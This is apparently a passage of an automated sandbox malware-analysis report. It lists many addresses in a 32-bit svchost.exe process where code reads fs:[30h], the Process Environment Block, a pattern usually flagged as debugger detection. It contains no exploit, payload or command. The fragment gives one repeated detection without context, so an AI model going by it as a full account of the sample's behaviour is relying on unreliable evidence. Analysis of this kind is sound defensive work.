Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0365B2C0 mov eax, dword ptr fs:[00000030h]	1_2_0365B2C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0365B2C0 mov eax, dword ptr fs:[00000030h]	1_2_0365B2C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0365B2C0 mov eax, dword ptr fs:[00000030h]	1_2_0365B2C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0365B2C0 mov eax, dword ptr fs:[00000030h]	1_2_0365B2C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0365B2C0 mov eax, dword ptr fs:[00000030h]	1_2_0365B2C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_036392C5 mov eax, dword ptr fs:[00000030h]	1_2_036392C5
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_036392C5 mov eax, dword ptr fs:[00000030h]	1_2_036392C5
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0362B2D3 mov eax, dword ptr fs:[00000030h]	1_2_0362B2D3
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0362B2D3 mov eax, dword ptr fs:[00000030h]	1_2_0362B2D3
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0362B2D3 mov eax, dword ptr fs:[00000030h]	1_2_0362B2D3
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0365F2D0 mov eax, dword ptr fs:[00000030h]	1_2_0365F2D0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0365F2D0 mov eax, dword ptr fs:[00000030h]	1_2_0365F2D0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_036402A0 mov eax, dword ptr fs:[00000030h]	1_2_036402A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_036402A0 mov eax, dword ptr fs:[00000030h]	1_2_036402A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_036452A0 mov eax, dword ptr fs:[00000030h]	1_2_036452A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_036452A0 mov eax, dword ptr fs:[00000030h]	1_2_036452A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_036452A0 mov eax, dword ptr fs:[00000030h]	1_2_036452A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_036452A0 mov eax, dword ptr fs:[00000030h]	1_2_036452A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_036F92A6 mov eax, dword ptr fs:[00000030h]	1_2_036F92A6
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_036F92A6 mov eax, dword ptr fs:[00000030h]	1_2_036F92A6
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_036F92A6 mov eax, dword ptr fs:[00000030h]	1_2_036F92A6
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_036F92A6 mov eax, dword ptr fs:[00000030h]	1_2_036F92A6
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_036C62A0 mov eax, dword ptr fs:[00000030h]	1_2_036C62A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_036C62A0 mov ecx, dword ptr fs:[00000030h]	1_2_036C62A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_036C62A0 mov eax, dword ptr fs:[00000030h]	1_2_036C62A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_036C62A0 mov eax, dword ptr fs:[00000030h]	1_2_036C62A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_036C62A0 mov eax, dword ptr fs:[00000030h]	1_2_036C62A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_036C62A0 mov eax, dword ptr fs:[00000030h]	1_2_036C62A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_036C72A0 mov eax, dword ptr fs:[00000030h]	1_2_036C72A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_036C72A0 mov eax, dword ptr fs:[00000030h]	1_2_036C72A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_036B92BC mov eax, dword ptr fs:[00000030h]	1_2_036B92BC
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_036B92BC mov eax, dword ptr fs:[00000030h]	1_2_036B92BC
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_036B92BC mov ecx, dword ptr fs:[00000030h]	1_2_036B92BC
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_036B92BC mov ecx, dword ptr fs:[00000030h]	1_2_036B92BC
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0366E284 mov eax, dword ptr fs:[00000030h]	1_2_0366E284
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0366E284 mov eax, dword ptr fs:[00000030h]	1_2_0366E284
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_036B0283 mov eax, dword ptr fs:[00000030h]	1_2_036B0283
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_036B0283 mov eax, dword ptr fs:[00000030h]	1_2_036B0283
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_036B0283 mov eax, dword ptr fs:[00000030h]	1_2_036B0283
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03705283 mov eax, dword ptr fs:[00000030h]	1_2_03705283
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0366329E mov eax, dword ptr fs:[00000030h]	1_2_0366329E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0366329E mov eax, dword ptr fs:[00000030h]	1_2_0366329E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0362F172 mov eax, dword ptr fs:[00000030h]	1_2_0362F172
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0362F172 mov eax, dword ptr fs:[00000030h]	1_2_0362F172
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0362F172 mov eax, dword ptr fs:[00000030h]	1_2_0362F172
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0362F172 mov eax, dword ptr fs:[00000030h]	1_2_0362F172
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0362F172 mov eax, dword ptr fs:[00000030h]	1_2_0362F172
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0362F172 mov eax, dword ptr fs:[00000030h]	1_2_0362F172
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0362F172 mov eax, dword ptr fs:[00000030h]	1_2_0362F172
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0362F172 mov eax, dword ptr fs:[00000030h]	1_2_0362F172
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0362F172 mov eax, dword ptr fs:[00000030h]	1_2_0362F172
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0362F172 mov eax, dword ptr fs:[00000030h]	1_2_0362F172
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0362F172 mov eax, dword ptr fs:[00000030h]	1_2_0362F172
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0362F172 mov eax, dword ptr fs:[00000030h]	1_2_0362F172
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0362F172 mov eax, dword ptr fs:[00000030h]	1_2_0362F172
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0362F172 mov eax, dword ptr fs:[00000030h]	1_2_0362F172
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0362F172 mov eax, dword ptr fs:[00000030h]	1_2_0362F172
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0362F172 mov eax, dword ptr fs:[00000030h]	1_2_0362F172
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0362F172 mov eax, dword ptr fs:[00000030h]	1_2_0362F172
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0362F172 mov eax, dword ptr fs:[00000030h]	1_2_0362F172
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0362F172 mov eax, dword ptr fs:[00000030h]	1_2_0362F172
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0362F172 mov eax, dword ptr fs:[00000030h]	1_2_0362F172
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0362F172 mov eax, dword ptr fs:[00000030h]	1_2_0362F172
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_036C9179 mov eax, dword ptr fs:[00000030h]	1_2_036C9179
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03705152 mov eax, dword ptr fs:[00000030h]	1_2_03705152
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_036C4144 mov eax, dword ptr fs:[00000030h]	1_2_036C4144
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_036C4144 mov eax, dword ptr fs:[00000030h]	1_2_036C4144
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_036C4144 mov ecx, dword ptr fs:[00000030h]	1_2_036C4144
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_036C4144 mov eax, dword ptr fs:[00000030h]	1_2_036C4144
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_036C4144 mov eax, dword ptr fs:[00000030h]	1_2_036C4144
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03629148 mov eax, dword ptr fs:[00000030h]	1_2_03629148
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03629148 mov eax, dword ptr fs:[00000030h]	1_2_03629148
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03629148 mov eax, dword ptr fs:[00000030h]	1_2_03629148
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03629148 mov eax, dword ptr fs:[00000030h]	1_2_03629148
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03637152 mov eax, dword ptr fs:[00000030h]	1_2_03637152
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0362C156 mov eax, dword ptr fs:[00000030h]	1_2_0362C156
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_036C8158 mov eax, dword ptr fs:[00000030h]	1_2_036C8158
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03636154 mov eax, dword ptr fs:[00000030h]	1_2_03636154
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03636154 mov eax, dword ptr fs:[00000030h]	1_2_03636154
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03660124 mov eax, dword ptr fs:[00000030h]	1_2_03660124
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03631131 mov eax, dword ptr fs:[00000030h]	1_2_03631131
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03631131 mov eax, dword ptr fs:[00000030h]	1_2_03631131
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0362B136 mov eax, dword ptr fs:[00000030h]	1_2_0362B136
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0362B136 mov eax, dword ptr fs:[00000030h]	1_2_0362B136
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0362B136 mov eax, dword ptr fs:[00000030h]	1_2_0362B136
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0362B136 mov eax, dword ptr fs:[00000030h]	1_2_0362B136
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_036DA118 mov ecx, dword ptr fs:[00000030h]	1_2_036DA118
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_036DA118 mov eax, dword ptr fs:[00000030h]	1_2_036DA118
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_036DA118 mov eax, dword ptr fs:[00000030h]	1_2_036DA118
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_036DA118 mov eax, dword ptr fs:[00000030h]	1_2_036DA118
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_036F0115 mov eax, dword ptr fs:[00000030h]	1_2_036F0115
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_036551EF mov eax, dword ptr fs:[00000030h]	1_2_036551EF
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_036551EF mov eax, dword ptr fs:[00000030h]	1_2_036551EF
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_036551EF mov eax, dword ptr fs:[00000030h]	1_2_036551EF
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_036551EF mov eax, dword ptr fs:[00000030h]	1_2_036551EF
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_036551EF mov eax, dword ptr fs:[00000030h]	1_2_036551EF
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_036551EF mov eax, dword ptr fs:[00000030h]	1_2_036551EF
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_036551EF mov eax, dword ptr fs:[00000030h]	1_2_036551EF
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_036551EF mov eax, dword ptr fs:[00000030h]	1_2_036551EF
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_036551EF mov eax, dword ptr fs:[00000030h]	1_2_036551EF
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_036551EF mov eax, dword ptr fs:[00000030h]	1_2_036551EF
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_036551EF mov eax, dword ptr fs:[00000030h]	1_2_036551EF
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_036551EF mov eax, dword ptr fs:[00000030h]	1_2_036551EF
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_036551EF mov eax, dword ptr fs:[00000030h]	1_2_036551EF
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_036351ED mov eax, dword ptr fs:[00000030h]	1_2_036351ED
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_036D71F9 mov esi, dword ptr fs:[00000030h]	1_2_036D71F9
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_037061E5 mov eax, dword ptr fs:[00000030h]	1_2_037061E5
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_036601F8 mov eax, dword ptr fs:[00000030h]	1_2_036601F8
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_036F61C3 mov eax, dword ptr fs:[00000030h]	1_2_036F61C3
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_036F61C3 mov eax, dword ptr fs:[00000030h]	1_2_036F61C3
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0366D1D0 mov eax, dword ptr fs:[00000030h]	1_2_0366D1D0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0366D1D0 mov ecx, dword ptr fs:[00000030h]	1_2_0366D1D0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_036AE1D0 mov eax, dword ptr fs:[00000030h]	1_2_036AE1D0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_036AE1D0 mov eax, dword ptr fs:[00000030h]	1_2_036AE1D0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_036AE1D0 mov ecx, dword ptr fs:[00000030h]	1_2_036AE1D0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_036AE1D0 mov eax, dword ptr fs:[00000030h]	1_2_036AE1D0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_036AE1D0 mov eax, dword ptr fs:[00000030h]	1_2_036AE1D0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_037051CB mov eax, dword ptr fs:[00000030h]	1_2_037051CB
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_036E11A4 mov eax, dword ptr fs:[00000030h]	1_2_036E11A4
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_036E11A4 mov eax, dword ptr fs:[00000030h]	1_2_036E11A4
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_036E11A4 mov eax, dword ptr fs:[00000030h]	1_2_036E11A4
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_036E11A4 mov eax, dword ptr fs:[00000030h]	1_2_036E11A4
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0364B1B0 mov eax, dword ptr fs:[00000030h]	1_2_0364B1B0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03670185 mov eax, dword ptr fs:[00000030h]	1_2_03670185
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_036EC188 mov eax, dword ptr fs:[00000030h]	1_2_036EC188
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_036EC188 mov eax, dword ptr fs:[00000030h]	1_2_036EC188
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_036B019F mov eax, dword ptr fs:[00000030h]	1_2_036B019F
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_036B019F mov eax, dword ptr fs:[00000030h]	1_2_036B019F
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_036B019F mov eax, dword ptr fs:[00000030h]	1_2_036B019F
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_036B019F mov eax, dword ptr fs:[00000030h]	1_2_036B019F
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0362A197 mov eax, dword ptr fs:[00000030h]	1_2_0362A197
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0362A197 mov eax, dword ptr fs:[00000030h]	1_2_0362A197
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0362A197 mov eax, dword ptr fs:[00000030h]	1_2_0362A197
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03687190 mov eax, dword ptr fs:[00000030h]	1_2_03687190
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_036B106E mov eax, dword ptr fs:[00000030h]	1_2_036B106E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03705060 mov eax, dword ptr fs:[00000030h]	1_2_03705060
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03641070 mov eax, dword ptr fs:[00000030h]	1_2_03641070
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03641070 mov ecx, dword ptr fs:[00000030h]	1_2_03641070
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03641070 mov eax, dword ptr fs:[00000030h]	1_2_03641070
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03641070 mov eax, dword ptr fs:[00000030h]	1_2_03641070
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03641070 mov eax, dword ptr fs:[00000030h]	1_2_03641070
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03641070 mov eax, dword ptr fs:[00000030h]	1_2_03641070
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03641070 mov eax, dword ptr fs:[00000030h]	1_2_03641070
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03641070 mov eax, dword ptr fs:[00000030h]	1_2_03641070
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03641070 mov eax, dword ptr fs:[00000030h]	1_2_03641070
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03641070 mov eax, dword ptr fs:[00000030h]	1_2_03641070
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03641070 mov eax, dword ptr fs:[00000030h]	1_2_03641070
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03641070 mov eax, dword ptr fs:[00000030h]	1_2_03641070
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03641070 mov eax, dword ptr fs:[00000030h]	1_2_03641070
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0365C073 mov eax, dword ptr fs:[00000030h]	1_2_0365C073
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_036AD070 mov ecx, dword ptr fs:[00000030h]	1_2_036AD070
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03632050 mov eax, dword ptr fs:[00000030h]	1_2_03632050
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_036D705E mov ebx, dword ptr fs:[00000030h]	1_2_036D705E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_036D705E mov eax, dword ptr fs:[00000030h]	1_2_036D705E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0365B052 mov eax, dword ptr fs:[00000030h]	1_2_0365B052
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_036B6050 mov eax, dword ptr fs:[00000030h]	1_2_036B6050
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0362A020 mov eax, dword ptr fs:[00000030h]	1_2_0362A020
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0362C020 mov eax, dword ptr fs:[00000030h]	1_2_0362C020
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_036F903E mov eax, dword ptr fs:[00000030h]	1_2_036F903E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_036F903E mov eax, dword ptr fs:[00000030h]	1_2_036F903E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_036F903E mov eax, dword ptr fs:[00000030h]	1_2_036F903E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_036F903E mov eax, dword ptr fs:[00000030h]	1_2_036F903E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_036B4000 mov ecx, dword ptr fs:[00000030h]	1_2_036B4000
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0364E016 mov eax, dword ptr fs:[00000030h]	1_2_0364E016
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0364E016 mov eax, dword ptr fs:[00000030h]	1_2_0364E016
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0364E016 mov eax, dword ptr fs:[00000030h]	1_2_0364E016
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0364E016 mov eax, dword ptr fs:[00000030h]	1_2_0364E016
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_036550E4 mov eax, dword ptr fs:[00000030h]	1_2_036550E4
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_036550E4 mov ecx, dword ptr fs:[00000030h]	1_2_036550E4
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0362A0E3 mov ecx, dword ptr fs:[00000030h]	1_2_0362A0E3
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_036380E9 mov eax, dword ptr fs:[00000030h]	1_2_036380E9
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_036B60E0 mov eax, dword ptr fs:[00000030h]	1_2_036B60E0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0362C0F0 mov eax, dword ptr fs:[00000030h]	1_2_0362C0F0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_036720F0 mov ecx, dword ptr fs:[00000030h]	1_2_036720F0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_036470C0 mov eax, dword ptr fs:[00000030h]	1_2_036470C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_036470C0 mov ecx, dword ptr fs:[00000030h]	1_2_036470C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_036470C0 mov ecx, dword ptr fs:[00000030h]	1_2_036470C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_036470C0 mov eax, dword ptr fs:[00000030h]	1_2_036470C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_036470C0 mov ecx, dword ptr fs:[00000030h]	1_2_036470C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_036470C0 mov ecx, dword ptr fs:[00000030h]	1_2_036470C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_036470C0 mov eax, dword ptr fs:[00000030h]	1_2_036470C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_036470C0 mov eax, dword ptr fs:[00000030h]	1_2_036470C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_036470C0 mov eax, dword ptr fs:[00000030h]	1_2_036470C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_036470C0 mov eax, dword ptr fs:[00000030h]	1_2_036470C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_036470C0 mov eax, dword ptr fs:[00000030h]	1_2_036470C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_036470C0 mov eax, dword ptr fs:[00000030h]	1_2_036470C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_036470C0 mov eax, dword ptr fs:[00000030h]	1_2_036470C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_036470C0 mov eax, dword ptr fs:[00000030h]	1_2_036470C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_036470C0 mov eax, dword ptr fs:[00000030h]	1_2_036470C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_036470C0 mov eax, dword ptr fs:[00000030h]	1_2_036470C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_036470C0 mov eax, dword ptr fs:[00000030h]	1_2_036470C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_036470C0 mov eax, dword ptr fs:[00000030h]	1_2_036470C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_037050D9 mov eax, dword ptr fs:[00000030h]	1_2_037050D9
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_036AD0C0 mov eax, dword ptr fs:[00000030h]	1_2_036AD0C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_036AD0C0 mov eax, dword ptr fs:[00000030h]	1_2_036AD0C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_036B20DE mov eax, dword ptr fs:[00000030h]	1_2_036B20DE
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_036590DB mov eax, dword ptr fs:[00000030h]	1_2_036590DB
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_036C80A8 mov eax, dword ptr fs:[00000030h]	1_2_036C80A8
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_036F60B8 mov eax, dword ptr fs:[00000030h]	1_2_036F60B8
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_036F60B8 mov ecx, dword ptr fs:[00000030h]	1_2_036F60B8
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0363208A mov eax, dword ptr fs:[00000030h]	1_2_0363208A
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0362D08D mov eax, dword ptr fs:[00000030h]	1_2_0362D08D
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03635096 mov eax, dword ptr fs:[00000030h]	1_2_03635096
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0365D090 mov eax, dword ptr fs:[00000030h]	1_2_0365D090
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0365D090 mov eax, dword ptr fs:[00000030h]	1_2_0365D090
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0366909C mov eax, dword ptr fs:[00000030h]	1_2_0366909C
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0362B765 mov eax, dword ptr fs:[00000030h]	1_2_0362B765
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0362B765 mov eax, dword ptr fs:[00000030h]	1_2_0362B765
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0362B765 mov eax, dword ptr fs:[00000030h]	1_2_0362B765
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0362B765 mov eax, dword ptr fs:[00000030h]	1_2_0362B765
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03638770 mov eax, dword ptr fs:[00000030h]	1_2_03638770
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03640770 mov eax, dword ptr fs:[00000030h]	1_2_03640770
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03640770 mov eax, dword ptr fs:[00000030h]	1_2_03640770
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03640770 mov eax, dword ptr fs:[00000030h]	1_2_03640770
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03640770 mov eax, dword ptr fs:[00000030h]	1_2_03640770
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03640770 mov eax, dword ptr fs:[00000030h]	1_2_03640770
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03640770 mov eax, dword ptr fs:[00000030h]	1_2_03640770
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03640770 mov eax, dword ptr fs:[00000030h]	1_2_03640770
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03640770 mov eax, dword ptr fs:[00000030h]	1_2_03640770
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03640770 mov eax, dword ptr fs:[00000030h]	1_2_03640770
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03640770 mov eax, dword ptr fs:[00000030h]	1_2_03640770
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03640770 mov eax, dword ptr fs:[00000030h]	1_2_03640770
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03640770 mov eax, dword ptr fs:[00000030h]	1_2_03640770
